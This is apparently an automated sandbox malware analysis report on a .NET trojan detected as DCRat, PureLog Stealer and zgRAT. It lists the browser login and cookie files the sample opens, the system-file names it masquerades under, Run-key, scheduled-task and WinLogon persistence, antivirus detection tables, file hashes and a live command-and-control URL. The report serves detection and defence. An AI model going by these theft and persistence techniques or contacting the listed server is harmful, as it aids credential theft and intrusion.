                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeQueries volume information: C:\Program Files (x86)\Windows NT\smartscreen.exe VolumeInformation
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeQueries volume information: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeQueries volume information: C:\Program Files (x86)\Windows NT\smartscreen.exe VolumeInformation
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            Source: Yara match, File source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: Process Memory Space: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe PID: 7416, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: services.exe PID: 5344, type: MEMORYSTR
                            Source: Yara match, File source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, type: SAMPLE
                            Source: Yara match, File source: 0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpack, type: UNPACKEDPE
                            Source: Yara match, File source: 00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\Program Files (x86)\Windows NT\smartscreen.exe, type: DROPPED
                            Source: Yara match, File source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, type: DROPPED
                            Source: Yara match, File source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, type: DROPPED
                            Source: Yara match, File source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, type: DROPPED
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                            Remote Access Functionality

                            Source: Yara match, File source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: Process Memory Space: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe PID: 7416, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: services.exe PID: 5344, type: MEMORYSTR
                            Source: Yara match, File source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, type: SAMPLE
                            Source: Yara match, File source: 0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpack, type: UNPACKEDPE
                            Source: Yara match, File source: 00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\Program Files (x86)\Windows NT\smartscreen.exe, type: DROPPED
                            Source: Yara match, File source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, type: DROPPED
                            Source: Yara match, File source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, type: DROPPED
                            Source: Yara match, File source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 144 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 41 Registry Run Keys / Startup Folder | 41 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | Security Account Manager | 341 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 133 Masquerading | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 261 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph (image not reproduced): Behavior Graph ID: 1584173, Sample: 6d86b21fec8d0f8698e2e22aeda..., Startdate: 04/01/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | 61% | Virustotal |  | Browse
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | 100% | Avira | HEUR/AGEN.1323342 |
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | 100% | Joe Sandbox ML |  |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows NT\smartscreen.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat | 100% | Avira | BAT/Delbat.C |
C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Windows NT\smartscreen.exe | 100% | Joe Sandbox ML |  |
C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe | 100% | Joe Sandbox ML |  |
C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe | 100% | Joe Sandbox ML |  |
C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe | 100% | Joe Sandbox ML |  |
C:\Users\user\Desktop\CeJjFnSo.log | 100% | Joe Sandbox ML |  |
C:\Program Files (x86)\Windows NT\smartscreen.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Users\user\Desktop\AIflJiPS.log | 25% | ReversingLabs |  |
C:\Users\user\Desktop\CeJjFnSo.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\JNOIyhEg.log | 9% | ReversingLabs |  |
C:\Users\user\Desktop\KpOqUOcm.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\LHRZphiV.log | 17% | ReversingLabs |  |
C:\Users\user\Desktop\NidZFKNk.log | 9% | ReversingLabs |  |
C:\Users\user\Desktop\PxIPwdiO.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\QgDirqoj.log | 8% | ReversingLabs |  |
C:\Users\user\Desktop\SVvXiHdY.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\WepxKXjB.log | 17% | ReversingLabs |  |
C:\Users\user\Desktop\bZqOSDZv.log | 25% | ReversingLabs |  |
C:\Users\user\Desktop\dUteJCDk.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\fePfJVil.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\hFbfZzNA.log | 25% | ReversingLabs |  |
C:\Users\user\Desktop\iuTVQPCp.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\kIKeCfec.log | 8% | ReversingLabs |  |
C:\Users\user\Desktop\lniDCMno.log | 17% | ReversingLabs |  |
C:\Users\user\Desktop\npUmXvsj.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\qaACfJCc.log | 25% | ReversingLabs |  |
C:\Users\user\Desktop\rWndvGZf.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\rxSvtOmf.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\syOLALyL.log | 25% | ReversingLabs |  |
C:\Users\user\Desktop\ujtbHYJE.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\urdulIjK.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\zNoaAjFw.log | 25% | ReversingLabs |  |
C:\Users\user\Desktop\zaakdHBM.log | 17% | ReversingLabs |  |
C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
                            No Antivirus matches
                            No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.t.com/pk | 0% | Avira URL Cloud | safe |
http://crl.microsoS | 0% | Avira URL Cloud | safe |
http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php | 0% | Avira URL Cloud | safe |
                            No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
154.29.71.9 | unknown | United States |  | 174 | COGENT-174US | true
                                                                                IP
                                                                                127.0.0.1
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1584173
                                                                                Start date and time:2025-01-04 14:51:08 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 41s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:54
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.spre.troj.spyw.expl.evad.winEXE@47/91@0/2
                                                                                EGA Information:
                                                                                • Successful, ratio: 50%
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                • Excluded IPs from analysis (whitelisted): 23.56.254.164, 20.12.23.50, 13.107.246.45, 20.109.210.53
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target powershell.exe, PID 7812 because it is empty
                                                                                • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                                                                                • Execution Graph export aborted for target services.exe, PID 5344 because it is empty
                                                                                • Execution Graph export aborted for target services.exe, PID 6020 because it is empty
                                                                                • Execution Graph export aborted for target services.exe, PID 7056 because it is empty
                                                                                • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:52:05 | API Interceptor | 139x Sleep call for process: powershell.exe modified
08:52:18 | API Interceptor | 2574179x Sleep call for process: System.exe modified
08:52:19 | API Interceptor | 2x Sleep call for process: svchost.exe modified
13:52:03 | Task Scheduler | Run new task: services path: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
13:52:03 | Task Scheduler | Run new task: servicess path: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
13:52:04 | Task Scheduler | Run new task: smartscreen path: "C:\Program Files (x86)\windows nt\smartscreen.exe"
13:52:04 | Task Scheduler | Run new task: smartscreens path: "C:\Program Files (x86)\windows nt\smartscreen.exe"
13:52:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
13:52:05 | Task Scheduler | Run new task: System path: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
13:52:05 | Task Scheduler | Run new task: SystemS path: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
13:52:05 | Task Scheduler | Run new task: TItoGxsDkTEZBWdlQNGwopi path: "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
13:52:05 | Task Scheduler | Run new task: TItoGxsDkTEZBWdlQNGwopiT path: "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
13:52:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
13:52:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\windows nt\smartscreen.exe"
13:52:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopi "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
13:52:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
13:52:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
13:52:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\windows nt\smartscreen.exe"
13:53:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopi "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
13:53:15 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
13:53:23 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
13:53:32 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\windows nt\smartscreen.exe"
13:53:41 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run TItoGxsDkTEZBWdlQNGwopi "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                13:53:58AutostartRun: WinLogon Shell "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                13:54:06AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                13:54:15AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                13:54:23AutostartRun: WinLogon Shell "C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                13:54:32AutostartRun: WinLogon Shell "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
Match: C:\Users\user\Desktop\AIflJiPS.log
Associated Sample Name / URL | Detection | Threat Name
aW6kSsgdvv.exe | malicious | DCRat, PureLog Stealer, zgRAT
HMhdtzxEHf.exe | malicious | DCRat, PureLog Stealer, zgRAT
kJrNOFEGbQ.exe | malicious | DCRat, PureLog Stealer, zgRAT
lEwK4xROgV.exe | malicious | DCRat, PureLog Stealer, zgRAT
Gg6wivFINd.exe | malicious | DCRat, PureLog Stealer, zgRAT
zZ1Y43bxxV.exe | malicious | DCRat
VqGD18ELBM.exe | malicious | DCRat, PureLog Stealer, zgRAT
updIMdPUj8.exe | malicious | DCRat
t8F7Ic986c.exe | malicious | DCRat, PureLog Stealer, zgRAT
544WP3NHaP.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with very long lines (329), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):329
                                                                                                    Entropy (8bit):5.840065784671832
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pV9/gUrAdpvBI2OCZwUQAERiORfd/HL4+cnxhHawqntEF0bf1yu:DFArv2EQXtRVH+nWwqne+L
                                                                                                    MD5:A6615291280882E3FDB7E6CED16663D9
                                                                                                    SHA1:D81035AFA2D6073DD964387FD88E3395DDAD234C
                                                                                                    SHA-256:AF2A39B3CFB4205A2603AA1583D35A2D4C5952A8E091DA8FD875DD37B5874D79
                                                                                                    SHA-512:409AE4AEF22636D78DE5D0573324BBD4E3BC2F2410DC06B7679B38C2C5F52D86529E92E63898988B23D15CBCD22DEBE3A782D4C861D2D8DA6D2F496BB949CC8E
                                                                                                    Malicious:false
                                                                                                    Preview:cmdyTwMFdyCKGbDxGScXllrdLg0OJyB1hJCbJ4RITD1oqOT6ZmV7lbt049nx675pxLm7ZloMATEhuCw6M3zgcDQGaLgJQeMVHL1fmWgx8J7RXLG2MqkCIYNu4fhOEe5fHsajLRU0XBiTF9tOFo6k4KNs8HkGzSsdObKougq5WuoG03o5wSIaiVl6fslErNAETFFnyEei8BNJfG1EcoUhJS420NJC5lNItkxvyAGrxkchHbbY0gmD3d4AKMxl5bmWxEa5TGPbhmtj0XvYvuMZ9KOQpwlmNfwW7FtCBgFtRKfRtVKwaY0KPNWn0JPgfmNCzXlunsWOp
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):203
                                                                                                    Entropy (8bit):5.667383457904253
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:Qy3qj+rCxatSAVK7WQNdpvVyPYLmvpP03gaf:Qy3q6rQbWUWkdBIALmRPPaf
                                                                                                    MD5:9A1F1A377F715548F79ECABEC54EAD9A
                                                                                                    SHA1:F7E22E0B2578DA0A9B54106571833BFD21DF9EF1
                                                                                                    SHA-256:B5E900458017C418DD845AA1D555121EB4590C6EAEF105356851A5CF95FDF4D7
